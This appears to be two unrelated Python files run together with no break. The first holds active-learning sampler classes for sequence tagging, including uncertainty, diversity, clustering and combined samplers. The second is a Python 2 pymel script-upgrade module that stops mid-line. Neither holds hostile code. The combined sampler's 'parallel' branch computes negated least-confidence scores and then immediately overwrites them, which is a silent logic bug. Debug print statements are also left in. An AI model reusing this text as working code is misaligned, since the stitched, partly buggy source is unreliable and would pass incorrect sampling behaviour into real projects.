class RandomSampler(BaseSampler):
    """Random sampling method"""

    def __call__(
        self,
        sentences: List[Sentence],
        tag_type: str,
        query_number: int,
        token_based: bool = False,
        **kwargs,
    ) -> List[int]:
        """Random sampling workflow

        Args:
            sentences (List[Sentence]): Sentences in data pool.
            tag_type (str): Tag type to predict.
            query_number (int): batch query number.
            token_based (bool, optional): If true, using query number as token number to query data.
                                          If false, using query number as sentence number to query data.
            kwargs:
                tagger: The tagger after training
                label_names (List[str]): Label name of all dataset
                embeddings: The embeddings method

        Returns:
            List[int]: Queried sentence ids.
        """
        # Fixed seed: the "random" order is deliberately reproducible.
        random.seed(0)
        sent_ids = list(range(len(sentences)))
        random_sent_ids = random.sample(sent_ids, len(sent_ids))
        queried_sent_ids = self.query(
            sentences, random_sent_ids, query_number, token_based
        )
        return queried_sent_ids


class LeastConfidenceSampler(BaseSampler):
    """Least confidence sampler

    https://dl.acm.org/doi/10.5555/1619410.1619452

    Args:
        BaseSampler: BaseSampler class.
    """

    def __call__(
        self,
        sentences: List[Sentence],
        tag_type: str,
        query_number: int,
        token_based: bool = False,
        **kwargs,
    ) -> List[int]:
        """Least confidence sampling workflow

        Args:
            sentences (List[Sentence]): Sentences in data pool.
            tag_type (str): Tag type to predict.
            query_number (int): batch query number.
            token_based (bool, optional): If true, using query number as token number to query data.
                                          If false, using query number as sentence number to query data.
            kwargs:
                tagger: The tagger after training
                label_names (List[str]): Label name of all dataset
                embeddings: The embeddings method

        Returns:
            List[int]: Queried sentence ids.
        """
        tagger = kwargs["tagger"]
        self.predict(sentences, tagger)
        scores = self.score(sentences, tagger)
        # Negated so "ascend" ordering yields least-confident sentences first.
        sorted_sent_ids = self.sort(-scores, order="ascend")
        queried_sent_ids = self.query(
            sentences, sorted_sent_ids, query_number, token_based
        )
        return queried_sent_ids

    def score(
        self,
        sentences: List[Sentence],
        tagger: SequenceTagger,
        kwargs: Optional[dict] = None,
    ) -> np.ndarray:
        """Calculate score for each sentence"""
        # Confidence score: 1 - P(most likely sequence).
        log_probs = tagger.log_probability(sentences)
        scores = 1 - np.exp(log_probs)

        return scores


class MaxNormLogProbSampler(BaseSampler):
    """Maximum Normalized Log-Probability sampler

    https://arxiv.org/abs/1707.05928

    Args:
        BaseSampler: BaseSampler class.
    """

    def __call__(
        self,
        sentences: List[Sentence],
        tag_type: str,
        query_number: int,
        token_based: bool = False,
        **kwargs,
    ) -> List[int]:
        """Maximum Normalized Log-Probability sampling workflow

        Args:
            sentences (List[Sentence]): Sentences in data pool.
            tag_type (str): Tag type to predict.
            query_number (int): batch query number.
            token_based (bool, optional): If true, using query number as token number to query data.
                                          If false, using query number as sentence number to query data.
            kwargs:
                tagger: The tagger after training
                label_names (List[str]): Label name of all dataset
                embeddings: The embeddings method

        Returns:
            List[int]: Queried sentence ids.
        """
        tagger = kwargs["tagger"]
        self.predict(sentences, tagger)
        scores = self.score(sentences, tagger)
        sorted_sent_ids = self.sort(scores, order="ascend")
        queried_sent_ids = self.query(
            sentences, sorted_sent_ids, query_number, token_based
        )
        return queried_sent_ids

    def score(
        self,
        sentences: List[Sentence],
        tagger: SequenceTagger,
        kwargs: Optional[dict] = None,
    ) -> np.ndarray:
        """Calculate score for each sentence"""
        # Normalize by sentence length so long sentences are not penalized.
        log_probs = tagger.log_probability(sentences)
        lengths = np.array([len(sent) for sent in sentences])
        normed_log_probs = log_probs / lengths

        return normed_log_probs


class StringNGramSampler(BaseSampler):
    """The StringNGramSampler class

    https://aclanthology.org/C10-1096.pdf

    Args:
        BaseSampler: BaseSampler class.
    """

    def __call__(
        self,
        sentences: List[Sentence],
        tag_type: str,
        query_number: int,
        token_based: bool = False,
        **kwargs,
    ) -> List[int]:
        """StringNGram similarity sampling workflow

        Args:
            sentences (List[Sentence]): Sentences in data pool.
            tag_type (str): Tag type to predict.
            query_number (int): batch query number.
            token_based (bool, optional): If true, using query number as token number to query data.
                                          If false, using query number as sentence number to query data.
            kwargs:
                tagger: The tagger after training
                label_names (List[str]): Label name of all dataset
                embeddings: The embeddings method

        Returns:
            List[int]: Queried sentence ids.
        """
        tagger = kwargs["tagger"]
        embeddings = kwargs["embeddings"]
        self.predict(sentences, tagger)
        entities = self.get_entities(sentences, embeddings, tag_type)

        # If no entities, return random indices
        if not entities.entities:
            random_sampler = RandomSampler()
            return random_sampler(sentences, tag_type, query_number, token_based)

        scores = self.score(sentences, entities)
        sorted_sent_ids = self.sort(scores, order="ascend")
        queried_sent_ids = self.query(
            sentences, sorted_sent_ids, query_number, token_based
        )
        return queried_sent_ids

    def score(
        self,
        sentences: List[Sentence],
        entities: Entities,
        kwargs: Optional[dict] = None,
    ) -> np.ndarray:
        """Calculate score for each sentence"""
        # Sentences without entities keep a score of 0.
        sentence_scores = [0] * len(sentences)
        diversities_per_sent = self.sentence_diversities(entities)
        for sent_id, score in diversities_per_sent.items():
            sentence_scores[sent_id] = score

        return np.array(sentence_scores)

    def trigram(self, entity: Entity) -> List[str]:
        """Get trigram of a entity

        Args:
            entity (Entity): Entity contains text

        Returns:
            List[str]: Entity trigram with ordinal number
                       e.g. "Peter" will return ['$$P1', '$Pe1', 'Pet1', 'ete1', 'ter1', 'er$1', 'r$$1']
                       e.g. "prepress" will return ['$$p1', '$pr1', 'pre1', 'rep1', 'epr1', 'pre2', 'res1', 'ess1', 'ss$1', 's$$1']
        """
        # The counter suffix disambiguates repeated trigrams within one entity.
        counter = defaultdict(int)
        entity = "$$" + entity.text + "$$"
        entity = entity.replace(" ", "_")
        trigrams = []
        for i in range(len(entity) - 3 + 1):
            span = entity[i : i + 3]  # noqa: E203
            counter[span] += 1
            trigrams.append(span + str(counter[span]))
        return trigrams

    def sentence_diversities(self, entities: Entities) -> Dict[int, float]:
        """Get diversity score of each sentence"""
        entities_per_label = entities.group_by_label
        entities_per_sentence = entities.group_by_sentence

        # Calculate similarities of all entities in one label
        similarities_per_label = self.similarity_matrix_per_label(
            entities_per_label
        )  # {"ORG": matrix, "PER": matrix}

        # Create index map
        # entity_id_map[label][sent_id][entity_id] = entity_id_in_label_entity_list
        sentence_count = max(entities_per_sentence.keys()) + 1
        max_entity_count = max(
            [len(entities) for entities in entities_per_sentence.values()]
        )
        entity_id_map = self.get_entity_id_map(
            entities_per_label, sentence_count, max_entity_count
        )

        # Calculate diversity for each sentence
        sentence_scores = self.calculate_diversity(
            entities_per_sentence, entity_id_map, similarities_per_label
        )

        return sentence_scores

    def calculate_diversity(
        self,
        entities_per_sentence: Dict[int, List[Entity]],
        entity_id_map: dict,
        similarities_per_label: dict,
    ) -> Dict[int, float]:
        # NOTE(review): annotations corrected — the method returns a
        # {sent_id: score} dict (keys are sentence ids), not a single float.
        """Calculate diversity score for a sentence"""
        sentence_scores = {}
        for sent_id, sentence_entities in entities_per_sentence.items():
            scores = []
            for entity in sentence_entities:
                entity_id_in_label_list = entity_id_map[entity.label][entity.sent_id][
                    entity.id
                ]
                similarities = similarities_per_label[entity.label][
                    int(entity_id_in_label_list)
                ]
                # Minimum similarity to any same-label entity in the pool.
                scores.append(float(similarities.min()))
            sentence_score = sum(scores) / len(sentence_entities)
            sentence_scores[sent_id] = sentence_score

        return sentence_scores

    def get_entity_id_map(
        self,
        entities_per_label: Dict[str, List[Entity]],
        sentence_count: int,
max_entity_count: int, ) -> Dict[str, np.ndarray]: """Get index map of entity from sentence id to the id in entity_per_label""" entity_id_map = {} for label, label_entities in entities_per_label.items(): if label not in entity_id_map: entity_id_map[label] = np.ones((sentence_count, max_entity_count)) for i, entity in enumerate( label_entities ): # entity id in label entities list print(i, entity, entity.sent_id, entity.id) entity_id_map[label][entity.sent_id][entity.id] = i print(entity_id_map) return entity_id_map def similarity_matrix_per_label( self, entities_per_label: Dict[str, List[Entity]] ) -> Dict[str, np.ndarray]: """Calculate similarity matrix of entities in each label""" similarity_matrix_per_label = {} for label, label_entities in entities_per_label.items(): entities_trigrams = [self.trigram(e) for e in label_entities] similarity_matrix = [] for i, entity in enumerate(label_entities): entity_trigrams = self.trigram(entity) similarities = [ self.trigram_cosine_similarity( entity_trigrams, entities_trigrams[i] ) for i in range(len(label_entities)) ] similarity_matrix.append(similarities) similarity_matrix_per_label[label] = np.array(similarity_matrix) return similarity_matrix_per_label def trigram_cosine_similarity( self, entity_trigram1: List[str], entity_trigram2: List[str] ) -> float: """Calculate trigram consine similarity""" similarity = len(set(entity_trigram1) & set(entity_trigram2)) / math.sqrt( len(entity_trigram1) * len(entity_trigram2) ) return similarity class DistributeSimilaritySampler(BaseSampler): """Distribute similarity sampler We create distribute similarity sampling as a kind of diversity sampling method. Different with most of sampling methods that are based on sentence level, Distribute similarity sampling method is implemented on token level. We calculate the similarity between entity pair, the low similarity pair means high diversity. Args: BaseSampler: BaseSampler class. 
""" def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Distribute similarity sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training label_names (List[str]): Label name of all dataset embeddings: The embeddings method Returns: List[int]: Queried sentence ids. """ tagger = kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) scores = self.score(sentences, entities) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], entities: Entities, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" sentence_scores = [0] * len(sentences) diversities_per_sent = self.sentence_diversities(entities) for sent_id, score in diversities_per_sent.items(): sentence_scores[sent_id] = score return np.array(sentence_scores) def sentence_diversities(self, entities: Entities) -> Dict[int, float]: """Get diversity score of each sentence""" entities_per_label = entities.group_by_label entities_per_sentence = entities.group_by_sentence # Calculate similarities of all entities in one label similarities_per_label = self.similarity_matrix_per_label( entities_per_label ) # {"ORG": matrix, "PER": matrix} # Create index map # entity_id_map[label][sent_id][entity_id] = 
entity_id_in_label_entity_list sentence_count = max(entities_per_sentence.keys()) + 1 max_entity_count = max( [len(entities) for entities in entities_per_sentence.values()] ) entity_id_map = self.get_entity_id_map( entities_per_label, sentence_count, max_entity_count ) # Calculate diversity for each sentence sentence_scores = self.calculate_diversity( entities_per_sentence, entity_id_map, similarities_per_label ) return sentence_scores def calculate_diversity( self, entities_per_sentence: Dict[str, List[Entity]], entity_id_map: dict, similarities_per_label: dict, ) -> float: """Calculate diversity score for a sentence""" sentence_scores = {} for sent_id, sentence_entities in entities_per_sentence.items(): scores = [] for entity in sentence_entities: entity_id_in_label_list = entity_id_map[entity.label][entity.sent_id][ entity.id ] similarities = similarities_per_label[entity.label][ int(entity_id_in_label_list) ] scores.append(float(similarities.min())) sentence_score = sum(scores) / len(sentence_entities) sentence_scores[sent_id] = sentence_score return sentence_scores def get_entity_id_map( self, entities_per_label: Dict[str, List[Entity]], sentence_count: int, max_entity_count: int, ) -> Dict[str, np.ndarray]: """Get index map of entity from sentence id to the id in entity_per_label Args: entities_per_label (Dict[str, List[Entity]]): Entity list in each label. sentence_count (int): Sentences count number, used for create matrix. max_entity_count (int): Max entities count in every sentence, used for create matrix. Returns: Dict[str, np.ndarray]: An index map convert entity id from sentence id to the id label entities list e.g. 
map[label][sent_id][entity_id] = entity_id_in_label_entities_list """ entity_id_map = {} for label, label_entities in entities_per_label.items(): if label not in entity_id_map: entity_id_map[label] = np.ones((sentence_count, max_entity_count)) for i, entity in enumerate( label_entities ): # entity id in label entities list print(i, entity, entity.sent_id, entity.id) entity_id_map[label][entity.sent_id][entity.id] = i print(entity_id_map) return entity_id_map def similarity_matrix_per_label( self, entities_per_label: Dict[str, List[Entity]] ) -> Dict[str, np.ndarray]: """Calculate similarity matrix of entities in each label""" similarity_matrix_per_label = {} for label, label_entities in entities_per_label.items(): vectors = torch.stack([entity.vector for entity in label_entities]) similarities = self.similarity_matrix(vectors, vectors) similarity_matrix_per_label[label] = ( similarities.cpu().detach().numpy().copy() ) return similarity_matrix_per_label class ClusterSimilaritySampler(BaseSampler): """Distribute similarity sampler We create cluster sampling as a kind of diversity sampling method. Different with most of sampling methods that are based on sentence level, Cluster sampling method is implemented on entity level. Cluster sampling classify all entity into cluster, and find the centen in each cluster. We calculate the similarity between center and entity in the same cluster, the low similarity pair means high diversity. Args: BaseSampler: BaseSampler class. """ def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Distribute similarity sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. 
kwargs: tagger: The tagger after training embeddings: The embeddings method kmeans_params (dict): Parameters for clustering, detail on sklearn.cluster.KMeans. e.g. {"n_clusters": 8, "n_init": 10, "random_state": 0} "n_clusters": The number of cluster (label types except "O") "n_init": Number of time the k-means algorithm will be run with different centroid seeds. "random_state": Determines random number generation for centroid initialization. Returns: List[int]: Queried sentence ids. """ tagger = kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) scores = self.score(sentences, entities, kwargs) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], entities: Entities, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" kmeans_params = self.get_kmeans_params(kwargs) sentence_scores = [0] * len(sentences) cluster_centers_matrix, entity_cluster_nums = self.kmeans( entities.entities, kmeans_params ) entities = self.assign_cluster(entities, entity_cluster_nums) diversities_per_sent = self.sentence_diversities( entities, cluster_centers_matrix ) for sent_id, score in diversities_per_sent.items(): sentence_scores[sent_id] = score return np.array(sentence_scores) def get_kmeans_params(self, kwargs: dict) -> bool: """Check the sampler type is availabel or not.""" if "kmeans_params" not in kwargs or "n_clusters" not in kwargs["kmeans_params"]: output = ( "You have to provide 'kmeans_params' parameter to use ClusterSimilaritySampler." 
" 'kmeans_params' must contain 'n_clusters', which means number of label types in dataset except 'O'." " For example, kmeans_params={'n_clusters': 8, 'n_init': 10, 'random_state': 0}}" ) raise NameError(output) kmeans_params = kwargs["kmeans_params"] return kmeans_params def sentence_diversities( self, entities: Entities, cluster_centers_matrix: np.ndarray ) -> Dict[int, float]: """Get diversity score of each sentence""" entities_per_cluster = entities.group_by_cluster entities_per_sentence = entities.group_by_sentence return { sent_id: self.calculate_diversity( sent_entities, entities_per_cluster, cluster_centers_matrix ) for sent_id, sent_entities in entities_per_sentence.items() } def assign_cluster( self, entities: Entities, entity_cluster_nums: np.ndarray ) -> Entities: """Assign cluster number to Entity""" new_entities = Entities() for i, entity in enumerate(entities.entities): entity.cluster = entity_cluster_nums[i] new_entities.add(entity) return new_entities def calculate_diversity( self, sentence_entities: List[Entity], entities_per_cluster: Dict[int, List[Entity]], cluster_centers_matrix: np.ndarray, ) -> float: """Calculate diversity score for a sentence""" scores = [] cluster_centers_matrix = torch.tensor(cluster_centers_matrix) for entity in sentence_entities: cluster_center_vector = cluster_centers_matrix[entity.cluster] vectors = torch.stack( [entity.vector for entity in entities_per_cluster[entity.cluster]] ) similarities = self.similarity_matrix( torch.stack([cluster_center_vector]), vectors ) score = torch.min(similarities) scores.append(float(score)) return sum(scores) / len(sentence_entities) def kmeans( self, entities: List[Entity], kmeans_params: dict ) -> Tuple[np.ndarray, np.ndarray]: """K-Means cluster to get cluster centers and entity cluster""" if "n_clusters" not in kmeans_params: raise KeyError("n_clusters is not found.") if "random_state" not in kmeans_params: kmeans_params["random_state"] = 0 kmeans = KMeans(**kmeans_params) 
entity_embedding_matrix = [entity.vector for entity in entities] entity_embedding_matrix = torch.stack( entity_embedding_matrix ) # e.g. shape is (36, 100) kmeans.fit(entity_embedding_matrix) cluster_centers_matrix = kmeans.cluster_centers_ # e.g. shape is (4, 100) entity_cluster_nums = ( kmeans.labels_ ) # e.g. [0, 2, 3, 1, ...], the number is the indices of index in cluster_centers_matrix return cluster_centers_matrix, entity_cluster_nums class CombinedMultipleSampler(BaseSampler): """Multiple similarity sampler Uncertainty-based samplers do not take full advantage of entity information. The proposed token-level diversity based sampler can fully utilize the entity information. So we combine diversity sampler and uncertainty-based sampler together to improve the active learning performance. Args: BaseSampler: BaseSampler class. """ @property def available_sampler_types(self): """Available samplers""" available_sampler_types = ["lc_ds", "lc_cs", "mnlp_ds", "mnlp_cs"] return available_sampler_types @property def available_combined_types(self): """Available combined type""" available_combined_types = ["series", "parallel"] return available_combined_types def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Combined multiple sampler sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: sampler_type (str): Which kind of sampler to use. Available types are "lc_ds", "lc_cs", "mnlp_ds", "mnlp_cs" - "lc_ds" means LeastConfidenceSampler and DistributeSimilaritySampler. - "lc_cs" means LeastConfidenceSampler and ClusterSimilaritySampler. - "mnlp_ds" means MaxNormLogProbSampler and DistributeSimilaritySampler. 
- "mnlp_cs" means MaxNormLogProbSampler and ClusterSimilaritySampler. combined_type (str): The combined method of different samplers. Available types are "series", "parallel" - "series" means run one sampler first and then run the second one. - "parallel" means run two samplers together. If sampler_type is "lc_ds", it means first run lc and then run ds. If reverse parameter is provided, it runs ds first and then lc. reverse (bool): The running order when combined type is "series" tagger: The tagger after training embeddings: The embeddings method kmeans_params (dict): Parameters for clustering, detail on sklearn.cluster.KMeans. e.g. {"n_clusters": 8, "n_init": 10, "random_state": 0} "n_clusters": The number of cluster (label types except "O") "n_init": Number of time the k-means algorithm will be run with different centroid seeds. "random_state": Determines random number generation for centroid initialization. Returns: List[int]: Queried sentence ids. """ sampler_type = self.get_sampler_type(kwargs) combined_type = self.get_combined_type(kwargs) scaler = self.get_scaler(kwargs) # Get samplers uncertainty_sampler, diversity_sampler = self.get_samplers(sampler_type) # Combine scores if combined_type == "series": uncertainty_sampler_queried_sent_ids = uncertainty_sampler( sentences, tag_type, 2 * query_number, token_based, **kwargs ) uncertainty_sampler_queried_sents = [ sentences[i] for i in uncertainty_sampler_queried_sent_ids ] queried_sent_ids = diversity_sampler( uncertainty_sampler_queried_sents, tag_type, query_number, token_based, **kwargs, ) return queried_sent_ids # The combine_type == "parallel" tagger = kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) # Calculate scores uncertainty_scores = 
uncertainty_sampler.score(sentences, tagger) diversity_scores = diversity_sampler.score(sentences, entities, kwargs) # Normalize scores if "lc" in sampler_type: # reverse lc order for ascend setup below scores = self.normalize_scores( -uncertainty_scores, diversity_scores, scaler ) scores = self.normalize_scores(uncertainty_scores, diversity_scores, scaler) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def normalize_scores( self, uncertainty_scores: np.ndarray, diversity_scores: np.ndarray, scaler: BaseEstimator, ) -> np.ndarray: """Normalize two kinds of scores Args: uncertainty_scores (np.ndarray): Scores calculated by uncertainty_sampler diversity_scores (np.ndarray): Scores calculated by diversity_sampler Returns: np.ndarray: Normalized score """ concatenate_scores = np.stack([uncertainty_scores, diversity_scores]) normalized_scores = scaler.fit_transform(np.transpose(concatenate_scores)) return normalized_scores.sum(axis=1) def get_samplers(self, sampler_type: str) -> Tuple[BaseSampler, BaseSampler]: """Get specific samplers""" if sampler_type == "lc_ds": uncertainty_sampler, diversity_sampler = ( LeastConfidenceSampler(), DistributeSimilaritySampler(), ) elif sampler_type == "lc_cs": uncertainty_sampler, diversity_sampler = ( LeastConfidenceSampler(), ClusterSimilaritySampler(), ) elif sampler_type == "mnlp_ds": uncertainty_sampler, diversity_sampler = ( MaxNormLogProbSampler(), DistributeSimilaritySampler(), ) elif sampler_type == "mnlp_cs": uncertainty_sampler, diversity_sampler = ( MaxNormLogProbSampler(), ClusterSimilaritySampler(), ) else: uncertainty_sampler, diversity_sampler = ( LeastConfidenceSampler(), DistributeSimilaritySampler(), ) return uncertainty_sampler, diversity_sampler def get_sampler_type(self, kwargs: dict) -> bool: """Check the sampler type is availabel or not.""" if "sampler_type" not in kwargs: sampler_type = "lc_ds" 
print("sampler_type is not found. Default use 'lc_ds' sampler type") return sampler_type sampler_type = kwargs["sampler_type"] if sampler_type not in self.available_sampler_types: raise NameError( f"sampler_type is not found. sampler_type must be one of {self.available_sampler_types}" ) return sampler_type def get_combined_type(self, kwargs: dict) -> bool: """Check the combined type is availabel or not.""" if "combined_type" not in kwargs: combined_type = "parallel" print("combined_type is not found. Default use 'parallel' combined type") return combined_type combined_type = kwargs["combined_type"] if combined_type not in self.available_combined_types: raise NameError( f"combined_type is not found. combined_type must be one of {self.available_combined_types}" ) return combined_type def get_scaler(self, kwargs: dict) -> bool: """Get scaler""" if "scaler" not in kwargs: scaler = MinMaxScaler() print("scaler is not found. Default use 'MinMaxScaler()'") return scaler return kwargs["scaler"]
""" This module provides functions for upgrading scripts from pymel 0.9 to 1.0. It fixes two types non-compatible code: - pymel.all is now the main entry-point for loading all pymel modules - import pymel --> import pymel.all as pymel - import pymel as pm --> import pymel.all as pm - from pymel import * --> from pymel.all import * - pymel.mayahook.versions.Version is now pymel.versions To use, run this in a script editor tab:: import pymel.tools.upgradeScripts pymel.tools.upgradeScripts.upgrade() This will print out all the modules that will be upgraded. If everything looks good run the following to perform the upgrade:: pymel.tools.upgradeScripts.upgrade(test=False) Once you're sure that the upgrade went smoothly, run:: pymel.tools.upgradeScripts.cleanup() This will delete the backup files. If you need to undo the changes, run:: pymel.tools.upgradeScripts.undo() Keep in mind that this will restore files to their state at the time that you ran ``upgrade``. If you made edits to the files after running ``upgrade`` they will be lost. 
""" import sys, os.path, re, shutil from collections import defaultdict import pymel.core # we don't use this, but it ensures that maya and sys.path are properly initialized #IMPORT_RE = re.compile( '(\s*import\s+(?:[a-zA-Z0-9_.,\s]+,\s*)?)(pymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*)((?:\s*,\s*[a-zA-Z][a-zA-Z0-9_.,\s]+)?(?:\s+as\s+([a-zA-Z][a-zA-Z0-9_]+))?(?:\s*))$' ) #IMPORT_RE = re.compile( r'(\s*import\s+(?:.*))(\bpymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*)(?:\s+as\s+([a-zA-Z][a-zA-Z0-9_]+))?(.*)$' ) IMPORT_RE = re.compile( r'(?P<start>\s*import\s+.*)(?P<pymel>\bpymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*\b)(?P<end>(?:\s+as\s+(?P<details>[a-zA-Z][a-zA-Z0-9_]+))?(?:.|\s)*)$' ) FROM_RE = re.compile( r'(?P<start>\s*from\s+)(?P<pymel>pymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*)(?P<end>(?:\s+import\s+(?P<details>[*]|(?:[a-zA-Z0-9_.,\s]+)))(?:\s*))$' ) #([a-zA-Z][a-zA-Z_.]+)([a-zA-Z][a-zA-Z_.]+) LOGNAME = 'pymel_upgrade.log' BACKUPEXT = '.pmbak' last_logfile = None def _getMayaAppDir(): if not os.environ.has_key('MAYA_APP_DIR') : home = os.environ.get('HOME', os.environ.get('USERPROFILE', None) ) if not home : return None else : if sys.platform == 'darwin': return os.path.join(home, 'Library/Preferences/Autodesk/maya') else: return os.path.join(home, 'maya') return os.environ['MAYA_APP_DIR'] objects = [ ( 'Version', re.compile('([a-zA-Z_][a-zA-Z0-9_.]+[.])?(Version[.])([a-zA-Z_][a-zA-Z0-9_]*)'), ('pymel', 'pymel.version', 'pymel.internal', 'pymel.internal.version' ), 'versions', { 'current' : 'current()', 'v85sp1' : 'v85_SP1', 'v2008sp1' : 'v2008_SP1', 'v2008ext2' : 'v2008_EXT2', 'v2009ext1' : 'v2009_EXT1', 'v2009sp1a' : 'v2009_SP1A' } ) ] PREFIX = 1 OBJECT = 2 SUFFIX = 3 class LogError(ValueError):pass def _getLogfile(logfile, read=True): if logfile is None: global last_logfile if last_logfile: logfile = last_logfile if logfile is None: baseDir = _getMayaAppDir() if not baseDir: baseDir = os.curdir logfile = logfile = os.path.join(baseDir, LOGNAME) if read and not os.path.isfile( logfile ): raise 
LogError, "could not find an existing %s. please pass the path to this file, which was generated during upgrade" % LOGNAME return os.path.realpath(logfile) def upgradeFile(filepath, test=True): """ upgrade a single file """ try: f = open(filepath) lines = f.readlines() f.close() except Exception, e: print str(e) return False, False modified = False uses_pymel = False pymel_namespaces = defaultdict(set) rev_pymel_namespaces = defaultdict(set) for i, line in enumerate(lines): m = IMPORT_RE.match(line) mode = None if not m: m = FROM_RE.match(line) mode = 'from' else: mode = 'import' if m: #start, pymel_module, end, details = m.groups() d= m.groupdict() start = d['start'] pymel_module = d['pymel'] end = d['end'] details = d['details'] if pymel_module == 'pymel.all': print "skipping. already uses 'pymel.all':", filepath return False, True uses_pymel = True if pymel_module == 'pymel': # import pymel, foo --> import pymel.all as pymel, foo # import pymel as pm, foo --> import pymel.all as pm, foo # from pymel import foo --> from pymel.all import foo as_name = ' as pymel' if mode == 'import' and not details else '' lines[i] = start + 'pymel.all' + as_name + end modified = True if details: details = details.strip() if mode == 'import': if details: pymel_namespaces[pymel_module].add(details) # pymel.version -> version # import pymel.internal as internal # 'internal' -> 'pymel.internal' rev_pymel_namespaces[details].add(pymel_module) else: # 'import pymel' pymel_namespaces[pymel_module].add(pymel_module) # import pymel.internal # 'pymel.internal' -> 'pymel.internal' rev_pymel_namespaces[pymel_module].add(pymel_module) elif mode == 'from': details = '' if details == '*' else details for detail in details.split(','): if detail: module = pymel_module + '.' 
+ detail else: module = pymel_module pymel_namespaces[pymel_module].add(detail) # from pymel import internal # 'internal' -> 'pymel.internal' # from pymel import * # '' -> 'pymel' rev_pymel_namespaces[detail].add(module) if uses_pymel: for obj, reg, obj_namespaces, replace, attr_remap in objects: parts = reg.split(line) if len(parts) > 1: #print parts for j in range(0, len(parts)-1, 4): try: ns = parts[j+PREFIX] except IndexError, err: pass else: ns = ns if ns else '' #print '\t', `ns` parts[j+PREFIX] = ns #print "checking namespace", `ns`, 'against', dict(rev_pymel_namespaces) for namespace, orig_namespaces in rev_pymel_namespaces.iteritems(): if namespace == '' or ns == namespace or ns.startswith(namespace + '.'): for orig_namespace in orig_namespaces: if namespace == '': expanded_ns = orig_namespace + '.' + ns else: expanded_ns = ns.replace(namespace, orig_namespace) #print 'expanded', expanded_ns if expanded_ns.rstrip('.') in obj_namespaces: #print "found namespace", `ns`, `expanded_ns` try: pmns = list(pymel_namespaces['pymel'])[0] except IndexError: print "warning: %s: no pymel namespace was found" % filepath else: if pmns =='': parts[j+PREFIX] = replace + '.' else: parts[j+PREFIX] = pmns + '.' + replace + '.' 
parts[j+OBJECT] = None attr = parts[j+SUFFIX] parts[j+SUFFIX] = attr_remap.get(attr, attr) break lines[i] = ''.join( [ x for x in parts if x is not None] ) #print 'before:', `line` #print 'after: ', `lines[i]` success = True if modified: if not test: tmpfile = filepath + '.tmp' try: f = open(tmpfile, 'w') f.writelines(lines) f.close() except (IOError, OSError), err: print "error writing temporary file: %s: %s" % ( tmpfile, err) success = False if success: try: os.rename(filepath, filepath + BACKUPEXT) except (IOError, OSError), err: print "error backing up file %s to %s.pmbak: %s" % ( filepath, filepath, err) success = False else: try: os.rename(tmpfile, filepath) except (IOError, OSError), err: print "error renaming temp file: %s" % ( err) success = False print "attempting to restore original file" try: os.rename(filepath + BACKUPEXT, filepath) except OSError, err: print "could not restore original: %s" % ( err) return modified, success def upgrade(logdir=None, test=True, excludeFolderRegex=None, excludeFileRegex=None, verbose=False, force=False): """ search PYTHONPATH (aka. sys.path) and MAYA_SCRIPT_PATH for python files using pymel that should be upgraded Keywords -------- :param logdir: directory to which to write the log of modified files :param test: when run in test mode (default) no files are changed :param excludeFolderRegex: a regex string which should match against a directory's basename, without parent path :param excludeFileRegex: a regex string which should match against a file's basename, without parent path or extension :param verbose: print more information during conversion :param force: by default, `upgrade` will skip files which already have already been processed, as determined by the existence of a backup file with a .pmbak extension. setting force to True will ignore this precaution """ if test: print "running in test mode. 
set test=False to enable file editing" if excludeFolderRegex: assert isinstance(excludeFolderRegex, basestring), "excludeFolderRegex must be a string" if excludeFileRegex: assert isinstance(excludeFileRegex, basestring), "excludeFileRegex must be a string" logfile = os.path.join(_getLogfile(logdir, read=False)) try: log = open(logfile, 'w' ) except (IOError, OSError), err: print "could not create log file at %s. please pass a writable directory to 'logdir' keyword: %s" % ( logdir, err) return global last_logfile last_logfile = logfile completed = [] try: for path in sys.path + os.environ['MAYA_SCRIPT_PATH'].split(os.pathsep): #for path in ['/Volumes/luma/_globalSoft/dev/chad/python/pymel']: for root, dirs, files in os.walk(path): for f in files: if f.endswith('.py') and not f.startswith('.'): if not excludeFileRegex or not re.match( excludeFileRegex, f[:-3] ): fpath = os.path.realpath(os.path.join(root,f)) if fpath not in completed: if os.path.exists(fpath+BACKUPEXT) and not force: print "file has already been converted. 
